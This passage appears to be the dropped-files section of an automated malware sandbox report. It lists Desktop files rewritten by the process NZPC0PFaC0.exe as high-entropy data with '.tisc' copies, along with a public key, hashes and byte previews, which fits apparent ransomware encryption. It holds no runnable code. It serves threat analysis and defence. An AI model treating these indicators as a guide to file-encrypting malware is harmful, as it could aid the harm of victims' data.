                                                                                    SHA-256:8A91D4610515779C84F6715AD364786816169427C5D77E0D8B36F484E057D16C
                                                                                    SHA-512:CA70474751DEF7A3FECE1D5BD2EDA70381D7CBECAF9413300A010741F9F8EE84F9F7B3149F542C7FB23A179D0514A81E775B57FC74F0DF8616D6A4D8F5031BEB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0VZ5848t+jS6gWIFkIWO\\nJOTEE8+EjZ46c\/\/357Hyjm4Frkcx4eaC9jj4GlZYr25XegsYtAHFzzfWhg0LsSdR\\nNbZsIK5lBV0DJvy568UEsnQajc6H4btl\/7ah5RSLGjlnaBCu0jk+KhWKuAJAIV3r\\noHXqTaBkO5x6i+e4R41Mpj8kXuYPgErF1TJXUmHMiWcYMn3xmXCnqT3\/VTx4dFVA\\nsYCZX+Z0uAyDBu+pDM4sJGq6kEEoXVpLFFmLPXdLPnuJt2rLzZOoJuUOOz169VDL\\noLx6UoLP5yOu1IHgZM3fSKnm3FybftQwl2P95g3+46Ico0ewR7gMCy3gRS5TXEF6\\nzQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw"}
                                                                                    C:\Users\user\Desktop\BJZFPPWAPT.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828171320127576
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:RlEZdniOynGNPRtXBZ4nZpEA+eeNSYc0K4juk2LdNYMEUypI8+YgbD:RYd5yERo4vjuk2Ldq/Uyq8aD
                                                                                    MD5:97421E17476C74D65293BA575200BAF5
                                                                                    SHA1:EA0B56169661261D6681C731E96C979449CAD37A
                                                                                    SHA-256:7844EEC73F4FDF34D43C38EEE6CAA8ED8024D97B27A74C6E66B872774C0DF96B
                                                                                    SHA-512:5B9BBF78FE37DE4AC4E89DE9971F1715AE07695DE4235CA7C1B57E95AC0736C0452D7D132F6E4D828B87E8E3CD7A4FD9E58BA83E8D7A2C2C502CF4741EA182EC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: Mom3Z..V'.......VJ.,.....vpL...=?.w......%..b.{.u.R...Z.........gcjt.SN....].{..t..b...&}T.1_3.b...CM.O....D..f.8.&......."k.........d.hMW0....$f.....%..q..W.....(.k...[{W.~-U.B@+.P.a.V...+........p..W.~%@...b..h..Xb2=d..G..:B..e$..@.,.'...7...z.gG...X..o.....t.X`6s.C...!49CL..[z...._..(..&..MB,..O.C....W~...G$&E...i9..4...&........0.....UvX.@jY...kc..A..7.S...E.Zs...$9..W...i.Mk..V<..D.eL.|^...{........8..Y-|.}......F}..("..M.K......p.%.?$a].i...x.G...:c..S...|.1[....6......6'.3...._m...)..F.",pm..5..J..`.L..={\ .Yg[.;..Y........a.-.a?{..O............../|.w.~.q4..2..KN.....&..a..g6.....s..........f.&..a/....K.W.....OZ_..."..O2..+...(.l.kmi..6rT...Y=.i'.<...........y....U...h...d`'....`%^.^.....4.qvY.$..k.nI=..&.......1....i......`.2`...%.Kg....._{Pbc%.4.".w=.....yI.0....3.....(...].{\......&..'.M?.........c.`2.g.Y.j....i....iub.b....W... ...}.g...J:N..C.......H158.}..*......O.,..i_......6\.....|..R...dI.4,..T.@....vLw.. 8ZSSFvs..N..
                                                                                    C:\Users\user\Desktop\BJZFPPWAPT.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828171320127576
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:RlEZdniOynGNPRtXBZ4nZpEA+eeNSYc0K4juk2LdNYMEUypI8+YgbD:RYd5yERo4vjuk2Ldq/Uyq8aD
                                                                                    MD5:97421E17476C74D65293BA575200BAF5
                                                                                    SHA1:EA0B56169661261D6681C731E96C979449CAD37A
                                                                                    SHA-256:7844EEC73F4FDF34D43C38EEE6CAA8ED8024D97B27A74C6E66B872774C0DF96B
                                                                                    SHA-512:5B9BBF78FE37DE4AC4E89DE9971F1715AE07695DE4235CA7C1B57E95AC0736C0452D7D132F6E4D828B87E8E3CD7A4FD9E58BA83E8D7A2C2C502CF4741EA182EC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: Mom3Z..V'.......VJ.,.....vpL...=?.w......%..b.{.u.R...Z.........gcjt.SN....].{..t..b...&}T.1_3.b...CM.O....D..f.8.&......."k.........d.hMW0....$f.....%..q..W.....(.k...[{W.~-U.B@+.P.a.V...+........p..W.~%@...b..h..Xb2=d..G..:B..e$..@.,.'...7...z.gG...X..o.....t.X`6s.C...!49CL..[z...._..(..&..MB,..O.C....W~...G$&E...i9..4...&........0.....UvX.@jY...kc..A..7.S...E.Zs...$9..W...i.Mk..V<..D.eL.|^...{........8..Y-|.}......F}..("..M.K......p.%.?$a].i...x.G...:c..S...|.1[....6......6'.3...._m...)..F.",pm..5..J..`.L..={\ .Yg[.;..Y........a.-.a?{..O............../|.w.~.q4..2..KN.....&..a..g6.....s..........f.&..a/....K.W.....OZ_..."..O2..+...(.l.kmi..6rT...Y=.i'.<...........y....U...h...d`'....`%^.^.....4.qvY.$..k.nI=..&.......1....i......`.2`...%.Kg....._{Pbc%.4.".w=.....yI.0....3.....(...].{\......&..'.M?.........c.`2.g.Y.j....i....iub.b....W... ...}.g...J:N..C.......H158.}..*......O.,..i_......6\.....|..R...dI.4,..T.@....vLw.. 8ZSSFvs..N..
                                                                                    C:\Users\user\Desktop\BNAGMGSPLO.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.864579731248268
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:7er8yfPy7QUKb4W1aqczHsVJj2U4WbQVIclJdb+HR3XisSubGhRL3akPT+q6gbD:7ednykpb4W1aqOMVcJxlJdYsUMRL3/Pn
                                                                                    MD5:25070161EEF7119789B374ADED51372B
                                                                                    SHA1:C43F607BB8F799015260C62EFD35B607C725705D
                                                                                    SHA-256:C3095018CCD3EFE81AAD07D4DDA9C5ABE5117865438E482D6ED9AEBA33E159F4
                                                                                    SHA-512:A84F649E50389247323627FA80F4BF305FE70EDAA1EEA6C76316F5A7A018188F151F889C0668066973F552DE47BED54C9A8AEB622AE2CD7409449D91CFDB35A7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ,.p...s..U.1....H.-.X...N.m..^..t...O...)....N.rJ...i.lZ{#.kv..Bd...l$.0..L..........9.I.x5......j.J.....Y..g...x.i./../'..rx...~..bj.."...`.{....._1I..;.[&...{.#=.....r..RHI...d..j..h.nSe..\E&.A.^8q.R9...W"?...2.F....Z-WA.CY..SY..O.T..@;%:\..Fb..%.T..Q..z..=*..eD.\.Wo.).m.j....r.,.Q.e.[.=].8.UQ.....o.....@Ks.9@\bAJ....x..@......[.9...U[.\".sr...O7.....n+.t......&....EmS.......`h......cL)..co..ba..9..>..:O.a8....o..|....e7.ev.GNG-..4J..T.......=||p.m.Xr/.s.......^L.;"~.r.@.v.eq...D.jnB.....A....W...b.^.?.$.9y.x.Fi.Es...ly..o.r..7...)..X...L...e...S......u......J.H?.ly..}!Z.PWy..,.}-....f....MF...;C..?.Pi.".z.d..K..*.......u...l...,L...;Q).+@n.J.......b. O.....O^.,..|;;U.........h@c(...1b!N....l.^Fi..-H........f=.DC.)0..H.......(.XLil 0.......4...|..g..P.Y..B.....~....."..M..O%....GH>...G.......i[.s...Y....c.v:.J...N.....:..W..Y.L..XS............o.6.;.E./.]#x..7.&.A..3...4...E..;...\$.........S1\._..~.Ejz..bA.faUb...mo.H..
                                                                                    C:\Users\user\Desktop\BNAGMGSPLO.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.864579731248268
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:7er8yfPy7QUKb4W1aqczHsVJj2U4WbQVIclJdb+HR3XisSubGhRL3akPT+q6gbD:7ednykpb4W1aqOMVcJxlJdYsUMRL3/Pn
                                                                                    MD5:25070161EEF7119789B374ADED51372B
                                                                                    SHA1:C43F607BB8F799015260C62EFD35B607C725705D
                                                                                    SHA-256:C3095018CCD3EFE81AAD07D4DDA9C5ABE5117865438E482D6ED9AEBA33E159F4
                                                                                    SHA-512:A84F649E50389247323627FA80F4BF305FE70EDAA1EEA6C76316F5A7A018188F151F889C0668066973F552DE47BED54C9A8AEB622AE2CD7409449D91CFDB35A7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ,.p...s..U.1....H.-.X...N.m..^..t...O...)....N.rJ...i.lZ{#.kv..Bd...l$.0..L..........9.I.x5......j.J.....Y..g...x.i./../'..rx...~..bj.."...`.{....._1I..;.[&...{.#=.....r..RHI...d..j..h.nSe..\E&.A.^8q.R9...W"?...2.F....Z-WA.CY..SY..O.T..@;%:\..Fb..%.T..Q..z..=*..eD.\.Wo.).m.j....r.,.Q.e.[.=].8.UQ.....o.....@Ks.9@\bAJ....x..@......[.9...U[.\".sr...O7.....n+.t......&....EmS.......`h......cL)..co..ba..9..>..:O.a8....o..|....e7.ev.GNG-..4J..T.......=||p.m.Xr/.s.......^L.;"~.r.@.v.eq...D.jnB.....A....W...b.^.?.$.9y.x.Fi.Es...ly..o.r..7...)..X...L...e...S......u......J.H?.ly..}!Z.PWy..,.}-....f....MF...;C..?.Pi.".z.d..K..*.......u...l...,L...;Q).+@n.J.......b. O.....O^.,..|;;U.........h@c(...1b!N....l.^Fi..-H........f=.DC.)0..H.......(.XLil 0.......4...|..g..P.Y..B.....~....."..M..O%....GH>...G.......i[.s...Y....c.v:.J...N.....:..W..Y.L..XS............o.6.;.E./.]#x..7.&.A..3...4...E..;...\$.........S1\._..~.Ejz..bA.faUb...mo.H..
                                                                                    C:\Users\user\Desktop\BNAGMGSPLO.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.819809934195165
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:zQDuUjnhEVxA6hBnhL4nE8J+YDyL2jrDWpkHxG6luEiaJSg9z4m0wSTlgbD:zQ6UrhGG249+7KrKWGKSgp4m0wvD
                                                                                    MD5:6AE6DD83461E9450D7E44D3FE42563D1
                                                                                    SHA1:31FCC32B2DAD69DC4CBEB0F761B757A2E23BB6EB
                                                                                    SHA-256:EDF92B507A3357D0A95964D9B9AF7819C005CEF9E969FEAB183CF030967C0F0F
                                                                                    SHA-512:1AD3C3326FA73AD6E3864FD416F7E8B1A05FBEC1B980B0A1CFC541B5D6B408835E2F8006344B0B9C70B8AE92A48FC71BA298CD0F05E47E1A7313794EA2F3A6B4
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..V.V|...s....}.J'NL.OZ.F....P....5..HA...........n.B.O.u......._W.{gd...nV.lI........:IE...R.d.!.:....~l....=.6........Zj....10.bK.i......F.g..7..L.zw.`.JL.p...;.s#.k....U.f[.!._..F...91....>^>].x...'e.V".s2.6..sD..E...ho*'..C/.k..%&.%v..:."..Dc.>..C.$..bTLA1.s8u=SS..\....g...."...).j...N.i..2.'.&.^.........lI9.^9.....8.+\>.S.!.ka.8.......K.g#+..,P+.ynm..."(k...=_.....g.m.\..PH.xaR..K..%~.Pg......e...p..h...4.l...;..`Zr.h.z.2.( U....[_...=q...~F..z ....|.-.^'.|_.nC....x.C...........t.>..x.6.K.~D.C..}!...t./M...Kqzz.....@...E..0..C:.....>d..Uk.o%8.9ML.!...a......,T...=V.G.._.1.....2.dp.O.9...9..w^.....1R.CY.5......(9..N...n..i.....6.I<DY...7.fn.....h.....8..FM9P>h.[.Z,5.BS.......*P.^...8..#....J.BH..w...ni.......c}o...o..O0.dP.1...n.....N..b..t...=.!./.!.,~k.Q.X.y...TL........8..4..^...!.../v|..%.8.....j....W......:&?^B....[S:.w.2$w.f...^.J...o....:......ie..3?M.......... ...P^T1.f.kP.}..d..-.../..E.\0P".sQ.C....q..I..MR.j..X>.n......G.1
                                                                                    C:\Users\user\Desktop\BNAGMGSPLO.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.819809934195165
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:zQDuUjnhEVxA6hBnhL4nE8J+YDyL2jrDWpkHxG6luEiaJSg9z4m0wSTlgbD:zQ6UrhGG249+7KrKWGKSgp4m0wvD
                                                                                    MD5:6AE6DD83461E9450D7E44D3FE42563D1
                                                                                    SHA1:31FCC32B2DAD69DC4CBEB0F761B757A2E23BB6EB
                                                                                    SHA-256:EDF92B507A3357D0A95964D9B9AF7819C005CEF9E969FEAB183CF030967C0F0F
                                                                                    SHA-512:1AD3C3326FA73AD6E3864FD416F7E8B1A05FBEC1B980B0A1CFC541B5D6B408835E2F8006344B0B9C70B8AE92A48FC71BA298CD0F05E47E1A7313794EA2F3A6B4
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..V.V|...s....}.J'NL.OZ.F....P....5..HA...........n.B.O.u......._W.{gd...nV.lI........:IE...R.d.!.:....~l....=.6........Zj....10.bK.i......F.g..7..L.zw.`.JL.p...;.s#.k....U.f[.!._..F...91....>^>].x...'e.V".s2.6..sD..E...ho*'..C/.k..%&.%v..:."..Dc.>..C.$..bTLA1.s8u=SS..\....g...."...).j...N.i..2.'.&.^.........lI9.^9.....8.+\>.S.!.ka.8.......K.g#+..,P+.ynm..."(k...=_.....g.m.\..PH.xaR..K..%~.Pg......e...p..h...4.l...;..`Zr.h.z.2.( U....[_...=q...~F..z ....|.-.^'.|_.nC....x.C...........t.>..x.6.K.~D.C..}!...t./M...Kqzz.....@...E..0..C:.....>d..Uk.o%8.9ML.!...a......,T...=V.G.._.1.....2.dp.O.9...9..w^.....1R.CY.5......(9..N...n..i.....6.I<DY...7.fn.....h.....8..FM9P>h.[.Z,5.BS.......*P.^...8..#....J.BH..w...ni.......c}o...o..O0.dP.1...n.....N..b..t...=.!./.!.,~k.Q.X.y...TL........8..4..^...!.../v|..%.8.....j....W......:&?^B....[S:.w.2$w.f...^.J...o....:......ie..3?M.......... ...P^T1.f.kP.}..d..-.../..E.\0P".sQ.C....q..I..MR.j..X>.n......G.1
                                                                                    C:\Users\user\Desktop\EEGWXUHVUG.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826660062016662
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:CsZKlPIfTIDTU3KPyKF7FtVVDhngtRzwa4p9r/IHhjGWMyYZ0gbD:CdsEDwPKZnVxlgtRzwdgyWdUD
                                                                                    MD5:B1EBAC5F7A0A6E78AEDBC995CF780DF5
                                                                                    SHA1:9AC314655E145C09CAA4FC42040DF7E846959F0C
                                                                                    SHA-256:339D7462D326FAA00203DFFC1D4C5BAA6DA160AA36FAA5A1F1F8A746721206A7
                                                                                    SHA-512:1DB61CDCE4A81370DDC3B8B80C8F175492DDE25E6E7645285BFF47851A983679155BD5CB7FD42840A9A47A9283EC4B356DBDD7A5E51411FD90E771F369897D93
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ......Qi.....(...FCd{q...].~.`.p....6E....R)...Lm..R.......q.OB..3..j.(....XT.*......*...w...L..a.A....K..;......bn...7.:..M..K.)E.ah...6n....0.M.F..y...nvi....7>..:.....\".DhA\.........G.....D..;V....Ma.....~.Y.b}......2.."dg`B.S....;.....K.:..~...t...I.7..m.......t..UKl....:..,M..X. .S..<I.s.M...t..2H.;*....+=N?n....~;..w....6G#.L/....0.f.k..ku.`.%.65.h!......pD.......-1v{.Miw..2.(.,.[...."4.)...a^T..l.@..DI...cg....J.5=..._.h.IU.....=LSn.xL.&g..K.va...MK...3=..:.m.....D..re`.F.M...oV_.<.D...n..R.#.O.*..[..h...@.>..>_............6W......SL..v....H..}.....f!....=..-..y.V$.ou...L..S.S9?.I..:.;%...\;nR].w..w..~..Q.}=)..#..}.9..#..Pj.>q..pN.Q.u.J..Ir.<..*....$.eS.X..~.b..:.N....a.V...yW....@.@.n.({e..E...lx....3.....+.H..A....x.M(.i..|{.._%.C.M..D"L.-.Kq.V.....2=f.......W.......E...m.OmF....w....Mz.c.k."..\...~`#....-m.C....D...."..5..\v..t...?...S.rDp<.7R..%.I&.......>L.......,.c.V.#...L...~.+-L...0...LC.c.?...=.i.. Lj.h.p..].#.....y.9.Z.6f2.
                                                                                    C:\Users\user\Desktop\EEGWXUHVUG.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826660062016662
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:CsZKlPIfTIDTU3KPyKF7FtVVDhngtRzwa4p9r/IHhjGWMyYZ0gbD:CdsEDwPKZnVxlgtRzwdgyWdUD
                                                                                    MD5:B1EBAC5F7A0A6E78AEDBC995CF780DF5
                                                                                    SHA1:9AC314655E145C09CAA4FC42040DF7E846959F0C
                                                                                    SHA-256:339D7462D326FAA00203DFFC1D4C5BAA6DA160AA36FAA5A1F1F8A746721206A7
                                                                                    SHA-512:1DB61CDCE4A81370DDC3B8B80C8F175492DDE25E6E7645285BFF47851A983679155BD5CB7FD42840A9A47A9283EC4B356DBDD7A5E51411FD90E771F369897D93
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ......Qi.....(...FCd{q...].~.`.p....6E....R)...Lm..R.......q.OB..3..j.(....XT.*......*...w...L..a.A....K..;......bn...7.:..M..K.)E.ah...6n....0.M.F..y...nvi....7>..:.....\".DhA\.........G.....D..;V....Ma.....~.Y.b}......2.."dg`B.S....;.....K.:..~...t...I.7..m.......t..UKl....:..,M..X. .S..<I.s.M...t..2H.;*....+=N?n....~;..w....6G#.L/....0.f.k..ku.`.%.65.h!......pD.......-1v{.Miw..2.(.,.[...."4.)...a^T..l.@..DI...cg....J.5=..._.h.IU.....=LSn.xL.&g..K.va...MK...3=..:.m.....D..re`.F.M...oV_.<.D...n..R.#.O.*..[..h...@.>..>_............6W......SL..v....H..}.....f!....=..-..y.V$.ou...L..S.S9?.I..:.;%...\;nR].w..w..~..Q.}=)..#..}.9..#..Pj.>q..pN.Q.u.J..Ir.<..*....$.eS.X..~.b..:.N....a.V...yW....@.@.n.({e..E...lx....3.....+.H..A....x.M(.i..|{.._%.C.M..D"L.-.Kq.V.....2=f.......W.......E...m.OmF....w....Mz.c.k."..\...~`#....-m.C....D...."..5..\v..t...?...S.rDp<.7R..%.I&.......>L.......,.c.V.#...L...~.+-L...0...LC.c.?...=.i.. Lj.h.p..].#.....y.9.Z.6f2.
                                                                                    C:\Users\user\Desktop\EFOYFBOLXA.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854455374705948
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ymBuuF4Q2ciBlRTZ8oEd/L/0+2otKg3eB5HYCr/IvF5TwRuwgbD:ymBpFScQf8b/bDtYf4C0t5Tw0pD
                                                                                    MD5:FCFABE73CAE8A504A286968A73AD1A44
                                                                                    SHA1:C8A6179CEB57740A57320045ABB704399D0E2789
                                                                                    SHA-256:7C8F29A0A1870C05CF5D5A74EBBB934843EF3DB901840C68300B583DDAEA9892
                                                                                    SHA-512:8943D8E8D05DB769ACE62AA5B8F935516F5D9CEA459D10043C15CFF403D10962B90DB64F6BD88FE38C14EA63086D93F2CE8C06771F39D081978E8BCB661EAC01
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .H0]=...-......Q.;w.......4w..iC......]..0.1'..#.=.P..WV..g...{G....b.3...qU.F....I0..eM..q......|K.L....!.Q.Q.Z......T8..-.h.....c|.v.....~2.Li"....D...Z..Z..p..S..&..ZV.@..zV".........f.a.jl$X...Z~....1.....J1..K".q.Q..=......:........k.2.n.D..G.@..6..O..j.XxV..%.>mx.j....* ......S#v..un...fx.../.R{.... >V..W..:#.G.M...<E.+.M.}3..@..[..H.`..M....b).o.V7...r...$...SzbIA.....jO.z...xt.(>......t..V..O.]X.\0.q..m...9.h).......xE...P.`g.%g..2h....d.Bi%%t.....A..X..ZMqk..\.~R..[..4.Q.+/...]0_+..*.#\.a.'.'.k.d.M..)...7......5.=^.@.kH........8..i.c.Ao.%..)...l..:.B...F.d.g&b...P..L*.h7..u..5Qg,p*...Ns..].U...M..?...]^Z.5.....~%..>..V.[s...E.y. ..y*xd...._!...k!......2..f.M.....f.......D...>.^x...O... .X....#..5..vc..YF..N/.....|.i..H..F........./.c.`......uo.Y....Lq.%.....7...$.9..z...JB..E..^.y....lT..Iz..GD.....k"?.Q^...\..r../.I.Z.q...%.4.....N"...%...y....3.b$X..Dl.7..T..u..$...dO..bS..:..Qq.-....z>vr...kIqO....."....j..>.._'Eg.
                                                                                    C:\Users\user\Desktop\EFOYFBOLXA.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854455374705948
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ymBuuF4Q2ciBlRTZ8oEd/L/0+2otKg3eB5HYCr/IvF5TwRuwgbD:ymBpFScQf8b/bDtYf4C0t5Tw0pD
                                                                                    MD5:FCFABE73CAE8A504A286968A73AD1A44
                                                                                    SHA1:C8A6179CEB57740A57320045ABB704399D0E2789
                                                                                    SHA-256:7C8F29A0A1870C05CF5D5A74EBBB934843EF3DB901840C68300B583DDAEA9892
                                                                                    SHA-512:8943D8E8D05DB769ACE62AA5B8F935516F5D9CEA459D10043C15CFF403D10962B90DB64F6BD88FE38C14EA63086D93F2CE8C06771F39D081978E8BCB661EAC01
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .H0]=...-......Q.;w.......4w..iC......]..0.1'..#.=.P..WV..g...{G....b.3...qU.F....I0..eM..q......|K.L....!.Q.Q.Z......T8..-.h.....c|.v.....~2.Li"....D...Z..Z..p..S..&..ZV.@..zV".........f.a.jl$X...Z~....1.....J1..K".q.Q..=......:........k.2.n.D..G.@..6..O..j.XxV..%.>mx.j....* ......S#v..un...fx.../.R{.... >V..W..:#.G.M...<E.+.M.}3..@..[..H.`..M....b).o.V7...r...$...SzbIA.....jO.z...xt.(>......t..V..O.]X.\0.q..m...9.h).......xE...P.`g.%g..2h....d.Bi%%t.....A..X..ZMqk..\.~R..[..4.Q.+/...]0_+..*.#\.a.'.'.k.d.M..)...7......5.=^.@.kH........8..i.c.Ao.%..)...l..:.B...F.d.g&b...P..L*.h7..u..5Qg,p*...Ns..].U...M..?...]^Z.5.....~%..>..V.[s...E.y. ..y*xd...._!...k!......2..f.M.....f.......D...>.^x...O... .X....#..5..vc..YF..N/.....|.i..H..F........./.c.`......uo.Y....Lq.%.....7...$.9..z...JB..E..^.y....lT..Iz..GD.....k"?.Q^...\..r../.I.Z.q...%.4.....N"...%...y....3.b$X..Dl.7..T..u..$...dO..bS..:..Qq.-....z>vr...kIqO....."....j..>.._'Eg.
                                                                                    C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):153934
                                                                                    Entropy (8bit):7.999010880418484
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:wfy4rO+nOzszIXYEVpMxm2uCqCYpw1aMuY3YDcfKEiGgBcKws:CTON7V+IXDCjluYID3G0cKd
                                                                                    MD5:21EB9CC145F03A1EF502E11040170494
                                                                                    SHA1:D9923B489B163EDECFF9C91BE047CC3E64E85E8E
                                                                                    SHA-256:F4CC69499024D03BEBFED51D3EFBCF05EA3FB018CDB9FA91BF627F73A23DDAB7
                                                                                    SHA-512:52BBE69DA43F89C96C7897DD49B33933E6A4E2EBD8DFFA8DC3A6D80FC4991C747674093E3F17084DFE1B939D36F4DBC78F758633CB7179B681AE1C00FAF2931D
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: :..]./.]..2.....G8.^...-0...3....Fw....=w%j|.-.."11.._....FN..Ep......X.|>...r..`.N.%..4.....QxyX7.1|.:k..x....3.S5.K...f..Uh.U..t.H;...AR<P-....%.y1.~:;-d....MB....~..Z........x....KI.Z..Z.s...=..7W.Q.c...........>U+...p.Q........x.a..%M.1t."..............=.....E..!.8. ........)...w'e...g)....R#....ke.Bl.L.5...`9....^..4.V...7w..h...3Y......8.E..:f...`.r.Z.i<qn1&.j..D. ..c.....n.....9......"R.d...,.Am"..JyLP.....9....B...&....n..h.L.0k.V.=..H.F-gH..`"N.D.....$...A.}..[N..Z..F..3V.I6.\l.Dz...D%..{..BI.....S..d..M.;o.9...v..9n../.1..s.U..U....><-0..a8@....%.....-....h.&...W..#...!....8<.s.3.+9..:....x....J.#.....+.3l..y....S..zLzt..Q....(@V.@7.6V...fz.~"r.y.nt.+q............-*.2R.L.rv..@.G..&.....).....1....../9.Z.qO..y4.<...8Q.r..SZw..d.@......C7.W....Q....p...0.B.Jo......VrKB-....>...H.sh.......ltGMDW...2w.~.k.a...P."...j....W..W....f3.3....;..E..v_O.p..u.1.=:c..w..O.Ki.....Q.0r..gayk...Z.PWS..1Z.<D-.._D].....G.q....
                                                                                    C:\Users\user\Desktop\NZPC0PFaC0.exe.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):153934
                                                                                    Entropy (8bit):7.999010880418484
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:wfy4rO+nOzszIXYEVpMxm2uCqCYpw1aMuY3YDcfKEiGgBcKws:CTON7V+IXDCjluYID3G0cKd
                                                                                    MD5:21EB9CC145F03A1EF502E11040170494
                                                                                    SHA1:D9923B489B163EDECFF9C91BE047CC3E64E85E8E
                                                                                    SHA-256:F4CC69499024D03BEBFED51D3EFBCF05EA3FB018CDB9FA91BF627F73A23DDAB7
                                                                                    SHA-512:52BBE69DA43F89C96C7897DD49B33933E6A4E2EBD8DFFA8DC3A6D80FC4991C747674093E3F17084DFE1B939D36F4DBC78F758633CB7179B681AE1C00FAF2931D
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: :..]./.]..2.....G8.^...-0...3....Fw....=w%j|.-.."11.._....FN..Ep......X.|>...r..`.N.%..4.....QxyX7.1|.:k..x....3.S5.K...f..Uh.U..t.H;...AR<P-....%.y1.~:;-d....MB....~..Z........x....KI.Z..Z.s...=..7W.Q.c...........>U+...p.Q........x.a..%M.1t."..............=.....E..!.8. ........)...w'e...g)....R#....ke.Bl.L.5...`9....^..4.V...7w..h...3Y......8.E..:f...`.r.Z.i<qn1&.j..D. ..c.....n.....9......"R.d...,.Am"..JyLP.....9....B...&....n..h.L.0k.V.=..H.F-gH..`"N.D.....$...A.}..[N..Z..F..3V.I6.\l.Dz...D%..{..BI.....S..d..M.;o.9...v..9n../.1..s.U..U....><-0..a8@....%.....-....h.&...W..#...!....8<.s.3.+9..:....x....J.#.....+.3l..y....S..zLzt..Q....(@V.@7.6V...fz.~"r.y.nt.+q............-*.2R.L.rv..@.G..&.....).....1....../9.Z.qO..y4.<...8Q.r..SZw..d.@......C7.W....Q....p...0.B.Jo......VrKB-....>...H.sh.......ltGMDW...2w.~.k.a...P."...j....W..W....f3.3....;..E..v_O.p..u.1.=:c..w..O.Ki.....Q.0r..gayk...Z.PWS..1Z.<D-.._D].....G.q....
                                                                                    C:\Users\user\Desktop\PIVFAGEAAV.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843253136191442
                                                                                    Encrypted:false
